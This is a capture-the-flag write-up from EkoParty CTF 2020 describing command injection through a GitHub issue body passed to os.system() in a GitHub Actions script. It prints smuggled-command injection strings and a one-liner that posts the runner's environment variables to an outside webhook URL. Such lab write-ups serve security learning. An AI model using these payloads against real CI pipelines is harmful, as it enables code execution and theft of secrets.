EkoPartyCTF - Env

EkoPartyCTF - Env

Lyell Read


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EkoParty CTF 2020 Git 3


Not too sure of the original prompt, however I did not need it.


After the second part of the git challenge saga, we have gotten a new repository with some new github actions. We know, before analyzing these however, that:

  • Issues filed to the ekolabs repo will be ‘moved’ to the ekoparty-internal repo.
  • We control content in the submitted issues, and this is copied to the new issues in ekoparty-internal repo.

That’s good information. Now let’s examine the actions for this repo – we are provided an issue-notify.py and an issue-notify.yml. At first glance at the python script, we see two interesting things:

  • The script checks if 'very important' in title: before executing an os.system() call
  • The script runs our ‘user input’ (the body of the issue) in the call to os.system().

What can we do with this? If we put “very important” in the title, and we include a specific body, we can execute arbitrary commands using the call to os.system(). How so?

os.system('echo "%s" > /tmp/%s' % (body, notify_id))

This line is vulnerable, as the body of our issue is placed in it’s entirety in the place of the first %s, so if we were to enter ", this would become:

os.system('echo """ > /tmp/%s' % (body, notify_id))

Which would echo an empty string to /tmp/$notify_id. This will not do, however, so we need something more complicated to do the trick. Maybe something like sending body of "; sleep 10; echo " will do better, as it will turn into:

os.system('echo ""; sleep 10; echo "" > /tmp/%s' % (body, notify_id))

Note: I did not come up with this all in one shot, I had to prototype it. I did this with the test.py script.

This will execute the sleep 10 just fine. We have code execution now, we just need to find out what to do with it. The challenge name indicates the flag is likely stored in the environment variables so we know where to look, but how to extract this info from the server?

To determine what tools are available for use, I looked to issue-notify.yml:

    runs-on: ubuntu-latest

      - name: Set up Python3
        if: ${{ success() }}
        uses: actions/setup-python@v1
        	python-version: "3.7"

We at least have a default installation of Python 3.7 to work with, that’s pretty good. To make use of that, we will need to have somewhere to send it, and that’s where a webhook tester, something that captures and displays (in this case) http requests sent to it. For this I used PipeDream. It provides you with a link to send requests to.

From there, it’s as easy as getting the environment variables os.environ, and sending them home to PipeDream with a little one-line bash / python script of sorts:

" && python3 -c "import requests; message = {'message': str(os.environ)}; r = requests.post('https://e756afb172e9b06dad06e8cfeff52a32.m.pipedream.net',data = message);" && echo "

That’s all there is to it: sending that returns envs to PipeDream, and it’s right in there.


~ Lyell Read